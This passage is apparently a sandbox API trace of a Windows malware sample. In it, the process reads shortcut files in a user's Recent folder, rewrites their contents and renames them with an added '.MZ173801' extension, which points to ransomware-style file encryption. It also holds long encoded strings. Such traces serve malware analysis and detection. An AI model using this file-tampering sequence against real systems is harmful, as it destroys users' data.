lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.484] GetCurrentThreadId () returned 0x1358 [0109.484] GetCurrentThreadId () returned 0x1358 [0109.484] GetCurrentThreadId () returned 0x1358 [0109.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.485] GetCurrentThreadId () returned 0x1358 [0109.485] GetCurrentThreadId () returned 0x1358 [0109.485] GetCurrentThreadId () returned 0x1358 [0109.485] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\I_TP.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\i_tp.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.485] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.486] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.486] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3a6 [0109.486] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.486] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3a6, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3a6, lpOverlapped=0x0) returned 1 [0109.486] CloseHandle (hObject=0x3f4) returned 1 [0109.487] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\I_TP.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\i_tp.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.487] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3a6, lpOverlapped=0x0) returned 1 [0109.488] CloseHandle (hObject=0x3f4) returned 1 [0109.489] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\I_TP.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\i_tp.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\I_TP.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\i_tp.lnk.mz173801")) returned 1 [0109.489] GetCurrentThreadId () returned 0x1358 [0109.490] GetCurrentThreadId () returned 0x1358 [0109.490] GetCurrentThreadId () returned 0x1358 [0109.490] GetCurrentThreadId () returned 0x1358 [0109.490] GetCurrentThreadId () returned 0x1358 [0109.490] GetCurrentThreadId () returned 0x1358 [0109.490] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9fa9379, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9fa9379, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9fa9379, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x28d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="JA9a6Ju2ZS4.lnk", cAlternateFileName="JA9A6J~1.LNK")) returned 1 [0109.490] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.490] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JA9a6Ju2ZS4.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ja9a6ju2zs4.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9fa9379, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9fa9379, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9fa9379, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x28d)) returned 1 [0109.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.490] GetCurrentThreadId () returned 0x1358 [0109.491] GetCurrentThreadId () returned 0x1358 [0109.491] GetCurrentThreadId () returned 0x1358 [0109.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.491] GetCurrentThreadId () returned 0x1358 [0109.491] GetCurrentThreadId () returned 0x1358 [0109.491] GetCurrentThreadId () returned 0x1358 [0109.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JA9a6Ju2ZS4.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ja9a6ju2zs4.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.491] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.492] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.492] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x28d [0109.492] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.492] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x28d, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x28d, lpOverlapped=0x0) returned 1 [0109.492] CloseHandle (hObject=0x3f4) returned 1 [0109.493] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JA9a6Ju2ZS4.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ja9a6ju2zs4.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.493] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x28d, 